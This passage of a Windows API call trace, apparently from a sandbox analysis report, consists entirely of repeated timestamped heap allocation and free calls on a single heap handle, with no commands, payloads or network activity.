| out: lpMsg=0x312fb74) returned 0 [0200.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.049] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.049] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.050] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.050] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.051] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.052] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.053] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.053] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.054] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.054] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.055] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.055] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.056] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.056] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.057] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.057] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.058] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.060] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.060] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.061] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.061] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.062] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.062] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.063] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.063] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.064] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.065] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.065] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.066] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.066] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.067] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.068] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.068] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.069] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.069] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.070] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.070] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0200.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.071] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.071] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.076] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0200.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0200.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0200.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0200.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0200.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0200.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0200.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 